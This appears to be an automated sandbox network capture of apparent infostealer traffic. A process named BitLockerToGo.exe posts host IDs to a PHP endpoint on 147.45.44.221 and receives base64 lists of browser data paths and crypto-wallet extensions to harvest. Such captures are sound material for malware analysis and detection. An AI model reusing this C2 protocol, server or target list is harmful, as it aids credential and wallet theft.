                                                                                                                                                    Oct 21, 2024 08:47:33.801434040 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:33.801445007 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:33.801496983 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:33.801528931 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:33.801608086 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:33.801676035 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:33.801750898 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:33.801851988 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:33.801901102 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:33.805967093 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:33.806019068 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:33.806054115 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:33.806103945 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:33.806107998 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:33.806116104 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:33.806128979 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:33.806138992 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:33.806149006 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:33.806164980 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:33.806174994 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:33.806176901 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:33.806194067 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:33.806200027 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:33.806205034 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:33.806241035 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:33.806256056 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:33.806257010 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:33.806267977 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:33.806288958 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:33.806301117 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:33.806310892 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:33.806330919 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:33.806339979 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:33.806375027 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:33.806426048 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:33.806468010 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:33.806485891 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:33.806559086 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:33.806570053 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:33.806588888 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:33.806654930 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:33.806663990 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:33.806721926 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:33.806731939 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:33.806787014 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:33.806797028 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:33.806912899 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:33.806921959 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:33.806926012 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:33.806936026 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:33.806946993 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:33.806957006 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:33.806976080 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:33.806986094 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:33.810702085 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:33.810713053 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:33.810755968 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:33.810766935 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:33.810798883 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:33.810808897 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:33.810818911 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:33.810828924 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:33.810966969 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:33.810976028 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:33.810981989 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:33.810983896 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:33.811058998 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:33.811110973 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:33.811208010 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:33.811217070 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:33.811224937 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:33.811275005 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:33.811284065 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:33.811290979 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:33.811322927 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:33.811331034 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:33.811340094 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:33.811350107 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:33.811367035 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:33.811373949 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:33.811394930 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:33.811403036 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:33.811431885 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:33.811439991 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:33.811503887 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:33.811511993 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:33.811518908 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:34.664860010 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:34.665021896 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:34.711456060 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:34.716293097 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:34.966022968 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:34.966135025 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:34.967072010 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:34.971882105 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:38.847279072 CEST8049732147.45.44.221192.168.2.4
                                                                                                                                                    Oct 21, 2024 08:47:38.847352982 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    Oct 21, 2024 08:47:41.212387085 CEST4973280192.168.2.4147.45.44.221
                                                                                                                                                    • 147.45.44.221
                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    0192.168.2.449732147.45.44.221802736C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    Oct 21, 2024 08:47:16.691220999 CEST88OUTGET / HTTP/1.1
                                                                                                                                                    Host: 147.45.44.221
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Oct 21, 2024 08:47:17.548475981 CEST203INHTTP/1.1 200 OK
                                                                                                                                                    Date: Mon, 21 Oct 2024 06:47:17 GMT
                                                                                                                                                    Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                    Content-Length: 0
                                                                                                                                                    Keep-Alive: timeout=5, max=100
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                    Oct 21, 2024 08:47:17.550791979 CEST419OUTPOST /28166bd28a5d19e6.php HTTP/1.1
                                                                                                                                                    Content-Type: multipart/form-data; boundary=----DAFBGHCAKKFCAKEBKJKK
                                                                                                                                                    Host: 147.45.44.221
                                                                                                                                                    Content-Length: 219
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Data Raw: 2d 2d 2d 2d 2d 2d 44 41 46 42 47 48 43 41 4b 4b 46 43 41 4b 45 42 4b 4a 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 35 37 39 34 30 30 32 39 30 43 35 33 35 32 38 30 30 33 31 39 37 0d 0a 2d 2d 2d 2d 2d 2d 44 41 46 42 47 48 43 41 4b 4b 46 43 41 4b 45 42 4b 4a 4b 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6e 66 7a 65 6f 6e 77 63 69 74 75 63 0d 0a 2d 2d 2d 2d 2d 2d 44 41 46 42 47 48 43 41 4b 4b 46 43 41 4b 45 42 4b 4a 4b 4b 2d 2d 0d 0a
                                                                                                                                                    Data Ascii: ------DAFBGHCAKKFCAKEBKJKKContent-Disposition: form-data; name="hwid"D579400290C53528003197------DAFBGHCAKKFCAKEBKJKKContent-Disposition: form-data; name="build"nfzeonwcituc------DAFBGHCAKKFCAKEBKJKK--
                                                                                                                                                    Oct 21, 2024 08:47:17.814910889 CEST407INHTTP/1.1 200 OK
                                                                                                                                                    Date: Mon, 21 Oct 2024 06:47:17 GMT
                                                                                                                                                    Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                    Content-Length: 180
                                                                                                                                                    Keep-Alive: timeout=5, max=99
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                    Data Raw: 4d 57 4d 7a 59 57 59 30 59 54 67 31 4e 6a 67 78 5a 44 63 35 5a 57 56 6d 59 6a 6c 6c 4d 7a 6b 78 4d 54 59 35 4e 32 55 78 4d 47 59 77 4e 57 4e 6c 4d 7a 67 30 4d 6d 4e 68 4e 6a 4d 78 5a 54 56 69 59 54 51 33 4e 7a 59 7a 59 7a 56 69 4e 44 49 32 4e 57 52 6a 5a 54 55 34 4d 7a 6b 33 4d 6d 59 33 66 48 64 72 61 32 70 78 59 57 6c 68 65 47 74 6f 59 6e 78 7a 62 57 70 73 62 47 31 35 62 57 78 69 65 6e 45 75 63 48 64 6b 66 44 46 38 4d 48 77 78 66 44 46 38 4d 58 77 78 66 44 46 38 4d 58 77 77 66 48 6c 69 62 6d 4e 69 61 48 6c 73 5a 58 42 74 5a 58 77 3d
                                                                                                                                                    Data Ascii: MWMzYWY0YTg1NjgxZDc5ZWVmYjllMzkxMTY5N2UxMGYwNWNlMzg0MmNhNjMxZTViYTQ3NzYzYzViNDI2NWRjZTU4Mzk3MmY3fHdra2pxYWlheGtoYnxzbWpsbG15bWxienEucHdkfDF8MHwxfDF8MXwxfDF8MXwwfHlibmNiaHlsZXBtZXw=
                                                                                                                                                    Oct 21, 2024 08:47:17.816734076 CEST468OUTPOST /28166bd28a5d19e6.php HTTP/1.1
                                                                                                                                                    Content-Type: multipart/form-data; boundary=----IECBGIDAEHCGDGCBKEBG
                                                                                                                                                    Host: 147.45.44.221
                                                                                                                                                    Content-Length: 268
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Data Raw: 2d 2d 2d 2d 2d 2d 49 45 43 42 47 49 44 41 45 48 43 47 44 47 43 42 4b 45 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 63 33 61 66 34 61 38 35 36 38 31 64 37 39 65 65 66 62 39 65 33 39 31 31 36 39 37 65 31 30 66 30 35 63 65 33 38 34 32 63 61 36 33 31 65 35 62 61 34 37 37 36 33 63 35 62 34 32 36 35 64 63 65 35 38 33 39 37 32 66 37 0d 0a 2d 2d 2d 2d 2d 2d 49 45 43 42 47 49 44 41 45 48 43 47 44 47 43 42 4b 45 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 49 45 43 42 47 49 44 41 45 48 43 47 44 47 43 42 4b 45 42 47 2d 2d 0d 0a
                                                                                                                                                    Data Ascii: ------IECBGIDAEHCGDGCBKEBGContent-Disposition: form-data; name="token"1c3af4a85681d79eefb9e3911697e10f05ce3842ca631e5ba47763c5b4265dce583972f7------IECBGIDAEHCGDGCBKEBGContent-Disposition: form-data; name="message"browsers------IECBGIDAEHCGDGCBKEBG--
                                                                                                                                                    Oct 21, 2024 08:47:18.070502043 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                    Date: Mon, 21 Oct 2024 06:47:17 GMT
                                                                                                                                                    Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                    Content-Length: 1520
                                                                                                                                                    Keep-Alive: timeout=5, max=98
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                    Data Raw: 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4e 6f 63 6d 39 74 5a 53 35 6c 65 47 56 38 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 53 42 44 59 57 35 68 63 6e 6c 38 58 45 64 76 62 32 64 73 5a 56 78 44 61 48 4a 76 62 57 55 67 55 33 68 54 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 78 44 61 48 4a 76 62 57 6c 31 62 58 78 63 51 32 68 79 62 32 31 70 64 57 31 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 78 6a 61 48 4a 76 62 57 55 75 5a 58 68 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 56 47 39 79 59 32 68 38 58 46 52 76 63 6d 4e 6f 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 4d 48 78 57 61 58 5a 68 62 47 52 70 66 46 78 57 61 58 5a 68 62 47 52 70 58 46 [TRUNCATED]
                                                                                                                                                    Data Ascii: R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfGNocm9tZS5leGV8R29vZ2xlIENocm9tZSBDYW5hcnl8XEdvb2dsZVxDaHJvbWUgU3hTXFVzZXIgRGF0YXxjaHJvbWV8Y2hyb21lLmV4ZXxDaHJvbWl1bXxcQ2hyb21pdW1cVXNlciBEYXRhfGNocm9tZXxjaHJvbWUuZXhlfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfDB8VG9yY2h8XFRvcmNoXFVzZXIgRGF0YXxjaHJvbWV8MHxWaXZhbGRpfFxWaXZhbGRpXFVzZXIgRGF0YXxjaHJvbWV8dml2YWxkaS5leGV8Q29tb2RvIERyYWdvbnxcQ29tb2RvXERyYWdvblxVc2VyIERhdGF8Y2hyb21lfDB8RXBpY1ByaXZhY3lCcm93c2VyfFxFcGljIFByaXZhY3kgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8Q29jQ29jfFxDb2NDb2NcQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8QnJhdmV8XEJyYXZlU29mdHdhcmVcQnJhdmUtQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyYXZlLmV4ZXxDZW50IEJyb3dzZXJ8XENlbnRCcm93c2VyXFVzZXIgRGF0YXxjaHJvbWV8MHw3U3RhcnxcN1N0YXJcN1N0YXJcVXNlciBEYXRhfGNocm9tZXwwfENoZWRvdCBCcm93c2VyfFxDaGVkb3RcVXNlciBEYXRhfGNocm9tZXwwfE1pY3Jvc29mdCBFZGdlfFxNaWNyb3NvZnRcRWRnZVxVc2VyIERhdGF8Y2hyb21lfG1zZWRnZS5leGV8MzYwIEJyb3dzZXJ8XDM2MEJyb3dzZXJcQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8UVFCcm93c2VyfFxUZW5jZW50XFFRQnJvd3Nl
                                                                                                                                                    Oct 21, 2024 08:47:18.070559025 CEST512INData Raw: 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 51 33 4a 35 63 48 52 76 56 47 46 69 66 46 78 44 63 6e 6c 77 64 47 39 55 59 57 49 67 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32
                                                                                                                                                    Data Ascii: clxVc2VyIERhdGF8Y2hyb21lfDB8Q3J5cHRvVGFifFxDcnlwdG9UYWIgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyb3dzZXIuZXhlfE9wZXJhIFN0YWJsZXxcT3BlcmEgU29mdHdhcmV8b3BlcmF8b3BlcmEuZXhlfE9wZXJhIEdYIFN0YWJsZXxcT3BlcmEgU29mdHdhcmV8b3BlcmF8b3BlcmEuZXhlfE1vemlsbGEgRml
                                                                                                                                                    Oct 21, 2024 08:47:18.071930885 CEST467OUTPOST /28166bd28a5d19e6.php HTTP/1.1
                                                                                                                                                    Content-Type: multipart/form-data; boundary=----EHIIIJDAAAAAAKECBFBA
                                                                                                                                                    Host: 147.45.44.221
                                                                                                                                                    Content-Length: 267
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                    Data Raw: 2d 2d 2d 2d 2d 2d 45 48 49 49 49 4a 44 41 41 41 41 41 41 4b 45 43 42 46 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 63 33 61 66 34 61 38 35 36 38 31 64 37 39 65 65 66 62 39 65 33 39 31 31 36 39 37 65 31 30 66 30 35 63 65 33 38 34 32 63 61 36 33 31 65 35 62 61 34 37 37 36 33 63 35 62 34 32 36 35 64 63 65 35 38 33 39 37 32 66 37 0d 0a 2d 2d 2d 2d 2d 2d 45 48 49 49 49 4a 44 41 41 41 41 41 41 4b 45 43 42 46 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 45 48 49 49 49 4a 44 41 41 41 41 41 41 4b 45 43 42 46 42 41 2d 2d 0d 0a
                                                                                                                                                    Data Ascii: ------EHIIIJDAAAAAAKECBFBAContent-Disposition: form-data; name="token"1c3af4a85681d79eefb9e3911697e10f05ce3842ca631e5ba47763c5b4265dce583972f7------EHIIIJDAAAAAAKECBFBAContent-Disposition: form-data; name="message"plugins------EHIIIJDAAAAAAKECBFBA--
                                                                                                                                                    Oct 21, 2024 08:47:18.325493097 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                    Date: Mon, 21 Oct 2024 06:47:18 GMT
                                                                                                                                                    Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                    Content-Length: 7116
                                                                                                                                                    Keep-Alive: timeout=5, max=97
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                    Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 5a 47 70 6a 62 47 4e 72 61 32 64 73 5a 57 4e 6f 62 32 39 69 62 47 35 6e 5a 32 68 6b 61 57 35 74 5a 57 56 74 61 32 4a 6e 59 32 6c 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 62 6d 74 69 61 57 68 6d 59 6d 56 76 5a 32 46 6c 59 57 39 6c 61 47 78 6c 5a 6d 35 72 62 32 52 69 5a 57 5a 6e 63 47 64 72 62 6d 35 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 61 57 4a 75 5a 57 70 6b 5a 6d 70 74 62 57 74 77 59 32 35 73 63 47 56 69 61 32 78 74 62 6d 74 76 5a 57 39 70 61 47 39 6d 5a 57 4e 38 4d 58 77 77 66 44 42 38 51 6d 6c 75 59 57 35 6a 5a 53 42 58 59 57 78 73 5a 58 52 38 5a 6d 68 69 62 32 68 70 62 57 46 6c 62 47 4a 76 61 48 42 71 59 6d 4a 73 5a 47 4e 75 5a 32 4e 75 59 58 42 75 5a 47 39 6b 61 6e 42 38 4d 58 77 77 66 44 42 38 57 57 39 79 62 32 6c 38 5a 6d [TRUNCATED]
                                                                                                                                                    Data Ascii: TWV0YU1hc2t8ZGpjbGNra2dsZWNob29ibG5nZ2hkaW5tZWVta2JnY2l8MXwwfDB8TWV0YU1hc2t8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8TWV0YU1hc2t8bmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58MXwwfDB8VHJvbkxpbmt8aWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8MXwwfDB8QmluYW5jZSBXYWxsZXR8Zmhib2hpbWFlbGJvaHBqYmJsZGNuZ2NuYXBuZG9kanB8MXwwfDB8WW9yb2l8ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8MXwwfDB8Q29pbmJhc2UgV2FsbGV0IGV4dGVuc2lvbnxobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHwxfDB8MXxHdWFyZGF8aHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBMaWJlcnR5fGNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfDF8MHwwfGlXYWxsZXR8a25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8MXwwfDB8TUVXIENYfG5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfDF8MHwwfEd1aWxkV2FsbGV0fG5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfDF8MHwwfFJvbmluIFdhbGxldHxmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3wxfDB8MHxOZW9MaW5lfGNwaGhsZ21nYW1lb2RuaGtqZG1rcGFubGVsbmxvaGFvfDF8MHwwfENMViBXYWxsZXR8bmhua2JrZ2ppa2djaWdhZG9ta3BoYWxhbm5kY2Fwamt8MXwwfDB8TGlxdWFsaXR5
                                                                                                                                                    Oct 21, 2024 08:47:18.325587034 CEST1236INData Raw: 49 46 64 68 62 47 78 6c 64 48 78 72 63 47 5a 76 63 47 74 6c 62 47 31 68 63 47 4e 76 61 58 42 6c 62 57 5a 6c 62 6d 52 74 5a 47 4e 6e 61 47 35 6c 5a 32 6c 74 62 6e 77 78 66 44 42 38 4d 48 78 55 5a 58 4a 79 59 53 42 54 64 47 46 30 61 57 39 75 49 46
                                                                                                                                                    Data Ascii: IFdhbGxldHxrcGZvcGtlbG1hcGNvaXBlbWZlbmRtZGNnaG5lZ2ltbnwxfDB8MHxUZXJyYSBTdGF0aW9uIFdhbGxldHxhaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHwxfDB8MHxLZXBscnxkbWthbWNrbm9na2djZGZoaGJkZGNnaGFjaGtlamVhcHwxfDB8MHxTb2xsZXR8ZmhtZmVuZGdkb2NtY2JtZmlrZGNvZ29
                                                                                                                                                    Oct 21, 2024 08:47:18.325618982 CEST264INData Raw: 66 47 52 75 5a 32 31 73 59 6d 78 6a 62 32 52 6d 62 32 4a 77 5a 48 42 6c 59 32 46 68 5a 47 64 6d 59 6d 4e 6e 5a 32 5a 71 5a 6d 35 74 66 44 46 38 4d 48 77 77 66 45 74 6c 5a 58 42 6c 63 69 42 58 59 57 78 73 5a 58 52 38 62 48 42 70 62 47 4a 75 61 57
                                                                                                                                                    Data Ascii: fGRuZ21sYmxjb2Rmb2JwZHBlY2FhZGdmYmNnZ2ZqZm5tfDF8MHwwfEtlZXBlciBXYWxsZXR8bHBpbGJuaWlhYmFja2RqY2lvbmtvYmdsbWRkZmJjam98MXwwfDB8U29sZmxhcmUgV2FsbGV0fGJoaGhsYmVwZGtiYXBhZGpkbm5vamtiZ2lvaW9kYmljfDF8MHwwfEN5YW5vIFdhbGxldHxka2RlZGxwZ2RtbWtrZmphYmZmZWd
                                                                                                                                                    Oct 21, 2024 08:47:18.325651884 CEST1236INData Raw: 4d 48 78 4c 53 45 4e 38 61 47 4e 6d 62 48 42 70 62 6d 4e 77 63 48 42 6b 59 32 78 70 62 6d 56 68 62 47 31 68 62 6d 52 70 61 6d 4e 74 62 6d 74 69 5a 32 35 38 4d 58 77 77 66 44 42 38 56 47 56 36 51 6d 39 34 66 47 31 75 5a 6d 6c 6d 5a 57 5a 72 59 57
